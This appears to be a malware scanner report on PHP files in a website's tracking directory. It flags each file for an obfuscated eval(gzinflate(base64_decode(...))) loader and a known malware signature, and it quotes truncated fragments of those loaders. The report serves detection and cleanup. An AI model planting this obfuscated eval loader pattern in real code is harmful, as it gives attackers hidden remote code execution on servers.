RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ1Z6XLbOBL+7yq/Qxv2hlKNKdnO5ehKHFtJvJXDO9Ls7pTjUkEkJGHMawHQx6T87tsASJGSKNkJk1QksNHo4+sL2t5qNk9nzLuGSSzAi6MJnzYa21t8ArWdCQ/YiN1xqWSN8MgLUp81M5pklpB6HX5sbwE+Pmc10hn3hjMmGHAJNAImRCwacGroQfOCKFZ4Thr5DbgIGJUMBHN5JBUNArDnK+opkGmSxEI1Os1xj9Tb21sP21uSScnjaITEQtX0omD/S7lgozjyWM3J5UsVD7R0jibZ3tpL6JRBFwj1Qx7pLwTX9/wxrkXsFs7eG157XhwmNOJM4jq+dXtTpk6C4DRfrll2zeYFihzE1AdjNpmZikvJVG1vNOgPBuffvl46qWRixH3nqjDSjFGfiRr5HHtUoSotCOIpj6wp25YGra2svnxScP3YH146VsL7zRxDGqG...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ1Z6XLbOBL+7yq/Qxv2hlKNKdnO5ehKHFtJvJXDO9Ls7pTjUkEkJGHMawHQx6T87tsASJGSKNkJk1QksNHo4+sL2t5qNk9nzLuGSSzAi6MJnzYa21t8ArWdCQ/YiN1xqWSN8MgLUp81M5pklpB6HX5sbwE+Pmc10hn3hjMmGHAJNAImRCwacGroQfOCKFZ4Thr5DbgIGJUMBHN5JBUNArDnK+opkGmSxEI1Os1xj9Tb21sP21uSScnjaITEQtX0omD/S7lgozjyWM3J5UsVD7R0jibZ3tpL6JRBFwj1Qx7pLwTX9/wxrkXsFs7eG157XhwmNOJM4jq+dXtTpk6C4DRfrll2zeYFihzE1AdjNpmZikvJVG1vNOgPBuffvl46qWRixH3nqjDSjFGfiRr5HHtUoSotCOIpj6wp25YGra2svnxScP3YH146VsL7zRxDGqG...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/pool_detail.php

Size: 1.69 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1XW2/iOBR+R+I/uF5WAWkonT6MdqeEbqegCm3VVkNX2lFbIZMY8IyxM44DZav+9z2+ACmFJtVuXpqY79y/c3xarbRafcE0I+wfJiZITylKaZoyKaoV/zJMNVG63jipVqoA79IxEyusIDOK5BglZEKrlZr5g0KEEyn5MKaaMI69WF9EPIuNnKARKCZqicaM07RaUfRnxhQdShFRFDALpK1MM36YTJPAKmDj+h81HvH2ceOpWkHwTCmJqarjSxkRDW5+RkzE9NGIYOOrwdBHpuH1eeWCCZRvIu1+QXL0nUYaXI9H4LigCzi0oU64HBGOal9759dfu/2ri8HJDi0S1CjksXOiGBlBSKCcaEQURT60+LBaufAKz6JIZkIPWPwBPjI9vZU/qFgFWRsOeoNB//rqLkiomjFbgeCh/bGBfNynnWqlnUaKJRrpZUJDrOmjbn0nc+JOcccBCadQtuCbzFBExH0AHkUm8+AdS23...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1XW2/iOBR+R+I/uF5WAWkonT6MdqeEbqegCm3VVkNX2lFbIZMY8IyxM44DZav+9z2+ACmFJtVuXpqY79y/c3xarbRafcE0I+wfJiZITylKaZoyKaoV/zJMNVG63jipVqoA79IxEyusIDOK5BglZEKrlZr5g0KEEyn5MKaaMI69WF9EPIuNnKARKCZqicaM07RaUfRnxhQdShFRFDALpK1MM36YTJPAKmDj+h81HvH2ceOpWkHwTCmJqarjSxkRDW5+RkzE9NGIYOOrwdBHpuH1eeWCCZRvIu1+QXL0nUYaXI9H4LigCzi0oU64HBGOal9759dfu/2ri8HJDi0S1CjksXOiGBlBSKCcaEQURT60+LBaufAKz6JIZkIPWPwBPjI9vZU/qFgFWRsOeoNB//rqLkiomjFbgeCh/bGBfNynnWqlnUaKJRrpZUJDrOmjbn0...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1XW2/iOBR+R+I/uF5WAWkonT6MdqeEbqegCm3VVkNX2lFbIZMY8IyxM44DZav+9z2+ACmFJtVuXpqY79y/c3xarbRafcE0I+wfJiZITylKaZoyKaoV/zJMNVG63jipVqoA79IxEyusIDOK5BglZEKrlZr5g0KEEyn5MKaaMI69WF9EPIuNnKARKCZqicaM07RaUfRnxhQdShFRFDALpK1MM36YTJPAKmDj+h81HvH2ceOpWkHwTCmJqarjSxkRDW5+RkzE9NGIYOOrwdBHpuH1eeWCCZRvIu1+QXL0nUYaXI9H4LigCzi0oU64HBGOal9759dfu/2ri8HJDi0S1CjksXOiGBlBSKCcaEQURT60+LBaufAKz6JIZkIPWPwBPjI9vZU/qFgFWRsOeoNB//rqLkiomjFbgeCh/bGBfNynnWqlnUaKJRrpZUJDrOmjbn0...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/email_tracking_setup.php

Size: 9.39 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09f3PjtrF/92buO+BoN5QmlmwnufYqW7o4jpvmtbnkxU7mZRyPhxIhiTmKVEnKPvfq7/528YMESQAkZfuS9D3enCWRwGKxWOwuFovl82f7+6dLOntL5nFCZnE0DxbD4fNnwbz3Yh6E9Jq+C9Is7TlBNAs3Pt0XRdbLtdPvP3/2/vkzApcf0J5zPJ1cLGlCSZASLyI0SeJkSE5ZBYLASBRn0M4m8ofku5B6KSUJHQRRmnlhSHj7mTfLSLpZr+MkGx7vTydO/+j5s/vnz1KapkEcXUPhJOvhzYT+cxMk9DqOZrTnSgQ3WRAiei4W2fWnZEwieku+/ILV2d+/WAJ6HEPPXwXRII7CO7L2FnSIj78DjMLY8wmjSsopEaQpzXq71+dn5+dff/vm0t2kNLkOfPdKocGSej5Nes4/4pmXAaYjEsaLIOKkOuJlgJoZ7w4D/LkCck2TVcC66F4dH/aJgPp68vzZcTpLgnVGsrs...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09f3PjtrF/92buO+BoN5QmlmwnufYqW7o4jpvmtbnkxU7mZRyPhxIhiTmKVEnKPvfq7/528YMESQAkZfuS9D3enCWRwGKxWOwuFovl82f7+6dLOntL5nFCZnE0DxbD4fNnwbz3Yh6E9Jq+C9Is7TlBNAs3Pt0XRdbLtdPvP3/2/vkzApcf0J5zPJ1cLGlCSZASLyI0SeJkSE5ZBYLASBRn0M4m8ofku5B6KSUJHQRRmnlhSHj7mTfLSLpZr+MkGx7vTydO/+j5s/vnz1KapkEcXUPhJOvhzYT+cxMk9DqOZrTnSgQ3WRAiei4W2fWnZEwieku+/ILV2d+/WAJ6HEPPXwXRII7CO7L2FnSIj78DjMLY8wmjSsopEaQpzXq71+dn5+dff/vm0t2kNLkOfPdKocGSej5Nes4/4pmXAaYjEsaLIOKkOuJlgJoZ7w4D/Lk...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09f3PjtrF/92buO+BoN5QmlmwnufYqW7o4jpvmtbnkxU7mZRyPhxIhiTmKVEnKPvfq7/528YMESQAkZfuS9D3enCWRwGKxWOwuFovl82f7+6dLOntL5nFCZnE0DxbD4fNnwbz3Yh6E9Jq+C9Is7TlBNAs3Pt0XRdbLtdPvP3/2/vkzApcf0J5zPJ1cLGlCSZASLyI0SeJkSE5ZBYLASBRn0M4m8ofku5B6KSUJHQRRmnlhSHj7mTfLSLpZr+MkGx7vTydO/+j5s/vnz1KapkEcXUPhJOvhzYT+cxMk9DqOZrTnSgQ3WRAiei4W2fWnZEwieku+/ILV2d+/WAJ6HEPPXwXRII7CO7L2FnSIj78DjMLY8wmjSsopEaQpzXq71+dn5+dff/vm0t2kNLkOfPdKocGSej5Nes4/4pmXAaYjEsaLIOKkOuJlgJoZ7w4D/Lk...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/email_tracking_stats.php

Size: 6.03 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAN08a3PbNrafNzP5DzDtXVETk5LdJjcrS2pcx87mbptkI7W7GdejgUhIQkKRXBKy42b83+85APgQX3o0vdtZ7DYmgQPg4LwPAOrxo07nYsGcT2QWRMQJ/Bmf2/bjR3xmHsy4xybsM49FbBrcd7yVyzoaJFyERrv9+NGXx48IFJcz0+hPh+MFixjhMaE+YVEURDa5kB0IDkb8QMA8K9+1yTuP0ZiRiFncjwX1PKLmF9QRJF6FYRAJu9+ZDo322eNHD48fxSyOeeBPADgSJlZG7N8rHrFJ4DvMbCUIrgT3EL1WPYg7tR2PM19sgHtH59ynAmZNAY/cKRkQn92Rl99LJDqd8QLWq5ZM3SX3rcD37klI58zG5newRC+gLpFkjhVpeRwzYR5NRpej0eu3b65bq5hFE+62bnJEXTDqssg0fggciUSPeAEgpGh/pmCAPULRRw78IjdkyKIllzRr3fRP2kSP+t3w8aN+7EQ8FET...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN08a3PbNrafNzP5DzDtXVETk5LdJjcrS2pcx87mbptkI7W7GdejgUhIQkKRXBKy42b83+85APgQX3o0vdtZ7DYmgQPg4LwPAOrxo07nYsGcT2QWRMQJ/Bmf2/bjR3xmHsy4xybsM49FbBrcd7yVyzoaJFyERrv9+NGXx48IFJcz0+hPh+MFixjhMaE+YVEURDa5kB0IDkb8QMA8K9+1yTuP0ZiRiFncjwX1PKLmF9QRJF6FYRAJu9+ZDo322eNHD48fxSyOeeBPADgSJlZG7N8rHrFJ4DvMbCUIrgT3EL1WPYg7tR2PM19sgHtH59ynAmZNAY/cKRkQn92Rl99LJDqd8QLWq5ZM3SX3rcD37klI58zG5newRC+gLpFkjhVpeRwzYR5NRpej0eu3b65bq5hFE+62bnJEXTDqssg0fggciUSPeAEgpGh/pmCAPULRRw7...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN08a3PbNrafNzP5DzDtXVETk5LdJjcrS2pcx87mbptkI7W7GdejgUhIQkKRXBKy42b83+85APgQX3o0vdtZ7DYmgQPg4LwPAOrxo07nYsGcT2QWRMQJ/Bmf2/bjR3xmHsy4xybsM49FbBrcd7yVyzoaJFyERrv9+NGXx48IFJcz0+hPh+MFixjhMaE+YVEURDa5kB0IDkb8QMA8K9+1yTuP0ZiRiFncjwX1PKLmF9QRJF6FYRAJu9+ZDo322eNHD48fxSyOeeBPADgSJlZG7N8rHrFJ4DvMbCUIrgT3EL1WPYg7tR2PM19sgHtH59ynAmZNAY/cKRkQn92Rl99LJDqd8QLWq5ZM3SX3rcD37klI58zG5newRC+gLpFkjhVpeRwzYR5NRpej0eu3b65bq5hFE+62bnJEXTDqssg0fggciUSPeAEgpGh/pmCAPULRRw7...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/graph_handler.php

Size: 9.67 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1de1fbyJL/e3JOvkNHhx3bg41tIGSGrNl1wAFuwLDYzFwuw9ERlgAltsSV5GSYuXz37Wq9+inLxoDJyMlJbHVVdfWjquvXKrVev/It37ddR/cDwwvKlfevX3nWv8e2Z+muM7DKJdsZDMemVR8H9nDl9ua2pCYxjcDSr8bOIMAC/YTYvnZcTDv2LU83Lt2olnodtU3Tdq6RP/Ds2wBZf1iDMXCiwB5Z7jhYQX0X3XrWV8sJkGkZ5tAdfFkhnGuNBvKtgeuYPiq/RSPbGQeWX3mNWxPowK4P7ZEdlDEd1EV4dvZ77Q8HHbTd3t7rvH51gwVaXlnbNgY3Vm3bdQLPHW4ix60N4EoVjcZ+UMO1G0MbGqZV3iMsZa/fP643V5qpgM4ft7gr/E3UM4IqWt1A/xgPUfOXX96hxtvNRgP/RbuH/Yh9B0tCNm7ijYVuDT8A3a6H7qUxREvtwcAdO0HPNqv4xzi46btfLAe+39q...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1de1fbyJL/e3JOvkNHhx3bg41tIGSGrNl1wAFuwLDYzFwuw9ERlgAltsSV5GSYuXz37Wq9+inLxoDJyMlJbHVVdfWjquvXKrVev/It37ddR/cDwwvKlfevX3nWv8e2Z+muM7DKJdsZDMemVR8H9nDl9ua2pCYxjcDSr8bOIMAC/YTYvnZcTDv2LU83Lt2olnodtU3Tdq6RP/Ds2wBZf1iDMXCiwB5Z7jhYQX0X3XrWV8sJkGkZ5tAdfFkhnGuNBvKtgeuYPiq/RSPbGQeWX3mNWxPowK4P7ZEdlDEd1EV4dvZ77Q8HHbTd3t7rvH51gwVaXlnbNgY3Vm3bdQLPHW4ix60N4EoVjcZ+UMO1G0MbGqZV3iMsZa/fP643V5qpgM4ft7gr/E3UM4IqWt1A/xgPUfOXX96hxtvNRgP/RbuH/Yh9B0tCNm7ijYVuDT8A3a6...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1de1fbyJL/e3JOvkNHhx3bg41tIGSGrNl1wAFuwLDYzFwuw9ERlgAltsSV5GSYuXz37Wq9+inLxoDJyMlJbHVVdfWjquvXKrVev/It37ddR/cDwwvKlfevX3nWv8e2Z+muM7DKJdsZDMemVR8H9nDl9ua2pCYxjcDSr8bOIMAC/YTYvnZcTDv2LU83Lt2olnodtU3Tdq6RP/Ds2wBZf1iDMXCiwB5Z7jhYQX0X3XrWV8sJkGkZ5tAdfFkhnGuNBvKtgeuYPiq/RSPbGQeWX3mNWxPowK4P7ZEdlDEd1EV4dvZ77Q8HHbTd3t7rvH51gwVaXlnbNgY3Vm3bdQLPHW4ix60N4EoVjcZ+UMO1G0MbGqZV3iMsZa/fP643V5qpgM4ft7gr/E3UM4IqWt1A/xgPUfOXX96hxtvNRgP/RbuH/Yh9B0tCNm7ijYVuDT8A3a6...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/pool_number.php

Size: 6.00 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1ce3PbRpL/31X+DmNYF5CW+JCyjvcokV5Z4mZ1JUsuS0ouJatYQ2BITgQCODwkMSl99+ueBwhCeJF2El3dTlIyCfQ0enp6un/dM+DLF53OicsjTvlv3J2SaMZIyMKQe+7LF+rDKIxoEDWa+y9fvATyYzbhrqZ16ZwRb0J8OmUvX2zhP6RPDN/znJEbz8csMFS3E9dyYhv7ucwCxjRYkAl3WPjyRcD+J+YBG3muxYjJBSHrxBF32v7MNwUDPmn8Y8uxnIO95u8vXxBoM0ZtFjSMU8+iEYjZI9y12QN2MVBWpGEPPIKPj1oEHKizHOnxB+KNf2VWBKLbYxDcZfdwUQx16nhj6pCtz8Oj88/HJ2c/XuzncPGATUAU7R0NOB3DkIA5jQgNGFFDs9tLhoeW5cVudMHtHfgSR7NL75a5+NnnP7EANa5HvDW6GF5cnJyfXZs+C+ZcTId5c7DbJEoJ7wcvXxyEVsD9iEQLn/W...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1ce3PbRpL/31X+DmNYF5CW+JCyjvcokV5Z4mZ1JUsuS0ouJatYQ2BITgQCODwkMSl99+ueBwhCeJF2El3dTlIyCfQ0enp6un/dM+DLF53OicsjTvlv3J2SaMZIyMKQe+7LF+rDKIxoEDWa+y9fvATyYzbhrqZ16ZwRb0J8OmUvX2zhP6RPDN/znJEbz8csMFS3E9dyYhv7ucwCxjRYkAl3WPjyRcD+J+YBG3muxYjJBSHrxBF32v7MNwUDPmn8Y8uxnIO95u8vXxBoM0ZtFjSMU8+iEYjZI9y12QN2MVBWpGEPPIKPj1oEHKizHOnxB+KNf2VWBKLbYxDcZfdwUQx16nhj6pCtz8Oj88/HJ2c/XuzncPGATUAU7R0NOB3DkIA5jQgNGFFDs9tLhoeW5cVudMHtHfgSR7NL75a5+NnnP7EANa5HvDW6GF5cnJyfXZs...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1ce3PbRpL/31X+DmNYF5CW+JCyjvcokV5Z4mZ1JUsuS0ouJatYQ2BITgQCODwkMSl99+ueBwhCeJF2El3dTlIyCfQ0enp6un/dM+DLF53OicsjTvlv3J2SaMZIyMKQe+7LF+rDKIxoEDWa+y9fvATyYzbhrqZ16ZwRb0J8OmUvX2zhP6RPDN/znJEbz8csMFS3E9dyYhv7ucwCxjRYkAl3WPjyRcD+J+YBG3muxYjJBSHrxBF32v7MNwUDPmn8Y8uxnIO95u8vXxBoM0ZtFjSMU8+iEYjZI9y12QN2MVBWpGEPPIKPj1oEHKizHOnxB+KNf2VWBKLbYxDcZfdwUQx16nhj6pCtz8Oj88/HJ2c/XuzncPGATUAU7R0NOB3DkIA5jQgNGFFDs9tLhoeW5cVudMHtHfgSR7NL75a5+NnnP7EANa5HvDW6GF5cnJyfXZs...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/handle_incoming_call.php

Size: 4.12 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1ceXObSBb/P1X+Dm1KZcRap5N1Eo2R49jKMZXEXkveqS1XisGoZTFBoIXGRyX57vu6G0QjaEA+sonHVFKy+nj9e69fvwvQ2hMf/ze0fWx4roXrqu1aTjjGbctzJ/Z5az6dq9pva5JBIbGdkiFD7F/YFg7ao0vbsb2S0YQNMqbYHGN/MXbtCW+oq/ueS7BLmuR6jnuI4CvSvpo5bFA0RNk3rSlu0oG+5/SQ6zUt2tJAszAgTR9fmI49NglWtN9Qu43ejUZH7W6rmxAYXM0BWNBDQ5M00NY2+j10UPfly+eo889epwP/0NuPo2j6AVBCtovIFKO5GRAKtjY+Qzpy8SU6eF2n0NrtYBbYLvv73PHOTAfVjgf7h8cH7z+9HTIGa8bx4F8ng+HoVH3jezP1M1AIiG/4eO6YICEFKQ1lU2mEvjPGljfG9cwMjZIXWkceUEGr0KEzlqnko/nH9nOlgRT4n4XB+LEn9SA8gzl...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1ceXObSBb/P1X+Dm1KZcRap5N1Eo2R49jKMZXEXkveqS1XisGoZTFBoIXGRyX57vu6G0QjaEA+sonHVFKy+nj9e69fvwvQ2hMf/ze0fWx4roXrqu1aTjjGbctzJ/Z5az6dq9pva5JBIbGdkiFD7F/YFg7ao0vbsb2S0YQNMqbYHGN/MXbtCW+oq/ueS7BLmuR6jnuI4CvSvpo5bFA0RNk3rSlu0oG+5/SQ6zUt2tJAszAgTR9fmI49NglWtN9Qu43ejUZH7W6rmxAYXM0BWNBDQ5M00NY2+j10UPfly+eo889epwP/0NuPo2j6AVBCtovIFKO5GRAKtjY+Qzpy8SU6eF2n0NrtYBbYLvv73PHOTAfVjgf7h8cH7z+9HTIGa8bx4F8ng+HoVH3jezP1M1AIiG/4eO6YICEFKQ1lU2mEvjPGljfG9cwMjZIXWkceUEG...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1ceXObSBb/P1X+Dm1KZcRap5N1Eo2R49jKMZXEXkveqS1XisGoZTFBoIXGRyX57vu6G0QjaEA+sonHVFKy+nj9e69fvwvQ2hMf/ze0fWx4roXrqu1aTjjGbctzJ/Z5az6dq9pva5JBIbGdkiFD7F/YFg7ao0vbsb2S0YQNMqbYHGN/MXbtCW+oq/ueS7BLmuR6jnuI4CvSvpo5bFA0RNk3rSlu0oG+5/SQ6zUt2tJAszAgTR9fmI49NglWtN9Qu43ejUZH7W6rmxAYXM0BWNBDQ5M00NY2+j10UPfly+eo889epwP/0NuPo2j6AVBCtovIFKO5GRAKtjY+Qzpy8SU6eF2n0NrtYBbYLvv73PHOTAfVjgf7h8cH7z+9HTIGa8bx4F8ng+HoVH3jezP1M1AIiG/4eO6YICEFKQ1lU2mEvjPGljfG9cwMjZIXWkceUEG...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/login.php

Size: 2.12 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAN1YbW/bNhD+HAP+DxfOgG2gtpIM61q/pa1jrBm6NWucAUMQGLRE20woUSWp2F6R/74jJflFcYo26fqhSmBT5PH43PHh3dHlkmZacxmNtKHK1OrtckmxjwlXbCQjn9WqPPJFEjAvMVw041lctSKVYAxdiNgcTt64OeXSVMgxFVD5e/Dh/PT9n8+gInyBn+OEi2AUJeGYKSfIJzWuNTO1yuh8cG5lL6uJZmrEg+pVvV4ufSqXAJ8ZowFTNfJO+tQgwhbwKGALi4HYJa0MW3CDzTurtyKoNqNECUT2qjL6MPjrYnA+vKzm3dWrtl0cavssjM2ytpKv12FzLn4GzJcB25BoAxOabYlVV2iquVnaKMGiGi5+9t6ubK1Ck6B3sLaqophOhEEF6MNGjyZmdoFidq6RQs6xWZiOPsw6Yqo1dmS26zk3/qyWKaynndkq9vEpIj5orTsK4/Y57m2/d7SveGzALGPWJYYtjHdNb2n...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN1YbW/bNhD+HAP+DxfOgG2gtpIM61q/pa1jrBm6NWucAUMQGLRE20woUSWp2F6R/74jJflFcYo26fqhSmBT5PH43PHh3dHlkmZacxmNtKHK1OrtckmxjwlXbCQjn9WqPPJFEjAvMVw041lctSKVYAxdiNgcTt64OeXSVMgxFVD5e/Dh/PT9n8+gInyBn+OEi2AUJeGYKSfIJzWuNTO1yuh8cG5lL6uJZmrEg+pVvV4ufSqXAJ8ZowFTNfJO+tQgwhbwKGALi4HYJa0MW3CDzTurtyKoNqNECUT2qjL6MPjrYnA+vKzm3dWrtl0cavssjM2ytpKv12FzLn4GzJcB25BoAxOabYlVV2iquVnaKMGiGi5+9t6ubK1Ck6B3sLaqophOhEEF6MNGjyZmdoFidq6RQs6xWZiOPsw6Yqo1dmS26zk3/qyWKaynndkq9vEpIj5...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN1YbW/bNhD+HAP+DxfOgG2gtpIM61q/pa1jrBm6NWucAUMQGLRE20woUSWp2F6R/74jJflFcYo26fqhSmBT5PH43PHh3dHlkmZacxmNtKHK1OrtckmxjwlXbCQjn9WqPPJFEjAvMVw041lctSKVYAxdiNgcTt64OeXSVMgxFVD5e/Dh/PT9n8+gInyBn+OEi2AUJeGYKSfIJzWuNTO1yuh8cG5lL6uJZmrEg+pVvV4ufSqXAJ8ZowFTNfJO+tQgwhbwKGALi4HYJa0MW3CDzTurtyKoNqNECUT2qjL6MPjrYnA+vKzm3dWrtl0cavssjM2ytpKv12FzLn4GzJcB25BoAxOabYlVV2iquVnaKMGiGi5+9t6ubK1Ck6B3sLaqophOhEEF6MNGjyZmdoFidq6RQs6xWZiOPsw6Yqo1dmS26zk3/qyWKaynndkq9vEpIj5...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/keyword_generated_call_report.php

Size: 5.44 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO0ca3PbNvK7Z/wfEFYpqbEedjp9nGXKl7N9aeaaOGc7d5cmPg1FQhJqilRJyLbS+r/fLkCQoERKpOxrezPHmcQSsFjsLnYXuwtQuzvd7uuAceawzywYEz6hJKZxzMJgdyf5MIi5E3Gr2dvd2QXwUzpigYINnCkl4YjMnDHd3WngH2IT44Yu7sLIG4xpQCOHU2/gOr4/iOgsjLiRIHoduP7cQ0wBdWEqJ1qQEfNpvLsT0Z/nLKKDMHApMZkApN05Z35nNpmZvTyElUK8c8YscDgQLeAkyWxk/bnhu/7Riyb5ZXeHwDOhjkcjy/ghdAX0IWGBR+9xkIGDEIbeMw4fHxSxKCQ/k9LpX0g4/Im6HNj2hsB0QO+gUYhp7IdDxyeNi7OT84vT129fXfYKsISAJiIJ7K0TMWcIzANyhxMnoiRh0evs7rxKEL503XAe8EvmteDLnE+uwhsaKC4bg8uzy8vX528/mjMaTZlYPfP...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0ca3PbNvK7Z/wfEFYpqbEedjp9nGXKl7N9aeaaOGc7d5cmPg1FQhJqilRJyLbS+r/fLkCQoERKpOxrezPHmcQSsFjsLnYXuwtQuzvd7uuAceawzywYEz6hJKZxzMJgdyf5MIi5E3Gr2dvd2QXwUzpigYINnCkl4YjMnDHd3WngH2IT44Yu7sLIG4xpQCOHU2/gOr4/iOgsjLiRIHoduP7cQ0wBdWEqJ1qQEfNpvLsT0Z/nLKKDMHApMZkApN05Z35nNpmZvTyElUK8c8YscDgQLeAkyWxk/bnhu/7Riyb5ZXeHwDOhjkcjy/ghdAX0IWGBR+9xkIGDEIbeMw4fHxSxKCQ/k9LpX0g4/Im6HNj2hsB0QO+gUYhp7IdDxyeNi7OT84vT129fXfYKsISAJiIJ7K0TMWcIzANyhxMnoiRh0evs7rxKEL503XAe8EvmteD...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0ca3PbNvK7Z/wfEFYpqbEedjp9nGXKl7N9aeaaOGc7d5cmPg1FQhJqilRJyLbS+r/fLkCQoERKpOxrezPHmcQSsFjsLnYXuwtQuzvd7uuAceawzywYEz6hJKZxzMJgdyf5MIi5E3Gr2dvd2QXwUzpigYINnCkl4YjMnDHd3WngH2IT44Yu7sLIG4xpQCOHU2/gOr4/iOgsjLiRIHoduP7cQ0wBdWEqJ1qQEfNpvLsT0Z/nLKKDMHApMZkApN05Z35nNpmZvTyElUK8c8YscDgQLeAkyWxk/bnhu/7Riyb5ZXeHwDOhjkcjy/ghdAX0IWGBR+9xkIGDEIbeMw4fHxSxKCQ/k9LpX0g4/Im6HNj2hsB0QO+gUYhp7IdDxyeNi7OT84vT129fXfYKsISAJiIJ7K0TMWcIzANyhxMnoiRh0evs7rxKEL503XAe8EvmteD...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

